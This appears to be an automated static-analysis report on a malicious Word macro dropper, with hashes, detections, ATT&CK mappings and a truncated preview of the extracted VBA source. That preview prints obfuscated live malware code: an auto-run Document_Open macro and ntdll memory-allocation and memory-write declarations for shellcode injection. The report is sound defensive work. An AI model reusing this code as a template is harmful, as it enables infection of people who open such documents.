Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 45ce33d346184499…

MALICIOUS

Office (OLE)

182.0 KB Created: 2017-11-08 14:40:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 7cc19381a10c7dfeaa198daff16046e6 SHA-1: 3b4673964778a38545c6ba43be04c7af5a70fe07 SHA-256: 45ce33d3461844999b883db1b54a51a37ac85115f17aea24906be23362562235
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6369142-0', indicating it functions as a dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the malicious payload is executed automatically upon opening the document. While the VBA code is truncated, the declared functions like 'NtAllocateVirtualMemory' and 'NtWriteVirtualMemory' from 'ntdll.dll' point towards memory manipulation, a common technique for loading and executing shellcode or second-stage malware. The overall intent appears to be the execution of a malicious payload, likely downloaded from an external source, making it a spearphishing attachment.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6369142-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6369142-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35330 bytes
SHA-256: 60e7549cf0e951de730826400a2ef45083bd8e1432527a51ca071ce5632e2296
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub Document_Open()
Dim newspaper As Integer
Dim chignon As Variant
groundnut = "solicitor"
apollons.oriya
kishke = 90 + 4
Pmt 0, kishke, 16112, 47021, 6
End Sub



Attribute VB_Name = "cassiope"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Ich warte hier
'  Doch ich weiГџ dass es dich gibt
Public Declare Function roundsman Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal cic As Any, combative As Any, bourgogne As Any, headsup As Any) As Long
'  He comes to me every night
'  Ich warte hier
Public Declare Function interception Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal bookish As Any, blister As Any, passionqueller As Any, mucoid As Any) As Long
'  With his hands around my neck
'  Sometimes love seems so far
Public Declare Function peerage _
Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (truncated As Long, maestoso As Long, ByVal freudian As Long, highmindedByVal As Long, await As Long, ByVal energy As Long) As Long
'  irgendwer mich liebt
'  Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function medley _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal timeswitch As Any, ByVal veal As Any, ByVal lysimachus As Any, ByVal heraldic As Any, ByVal myctophidae As Any) As Long
'  Die Nacht Г¶ffnet ihren SchoГџ
'  Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (discountenance As Any, ByVal calcine As Any, ByVal gymnura As Any, ByVal forthcoming As Any, ByVal antigropelos As Any, ByVal reestate As Any, ByVal revendicate As Any) As Long
'  Die Nacht Г¶ffnet ihren SchoГџ
'  Dont die before I do
#End If


'  In my dreams he does exist
'  Sometimes love seems so far
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  His passion is a kiss
'  Ich warte hier
Public Declare PtrSafe Function dysmenorrhea Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal barrage As Any, aphonia As Any, empress As Any, celtis As Any) As LongPtr
'  I know that you exist
'  I dont know who he is
Public Declare PtrSafe Function medley _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal flagellate As Any, ByVal epiphytic As Any, ByVal paleozoology As Any, ByVal clipboard As Any, ByVal bahamian As Any) As LongPtr
'  I dont know who you are
'  Sometimes love seems so far
Public Declare PtrSafe Function peerage _
Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (drown As LongPtr, marriageability As LongPtr, ByVal bloodlessly As LongPtr, applicationsByVal As LongPtr, atrophic As LongPtr, ByVal ichthyolatry As LongPtr) As LongPtr
'  Ich weiAY dass irgendwann
'  Dont die before I do
Public Declare PtrSafe Function kris Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal formerly As Any, shoddily As Any, avibus As Any, kalotermitidae As Any) As LongPtr
'  Ich warte hier
'  irgendwer mich liebt
Public Declare PtrSafe Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (affenpinscher As Any, ByVal unshaped As Any, ByVal borate As Any, ByVal bumpiness As Any, ByVal compages As Any, ByVal cello As Any, ByVal spergula As Any) As Long
'  Doch ich weiAY dass es dich gibt
'  Ich warte hier
#End If



Attribute VB_Name = "unobtrusive"
Attribute VB_Base = "0{F89CB859-E800-4982-91EA-E22374C77730}{49DE4848-A0DA-4E26-9BC2-07C4D593AA63}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "apollons"
Function gayety(unresolved, gingle, airmail)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim dolabriform As Byte
Dim feels As Variant
Dim mayaca
... (truncated)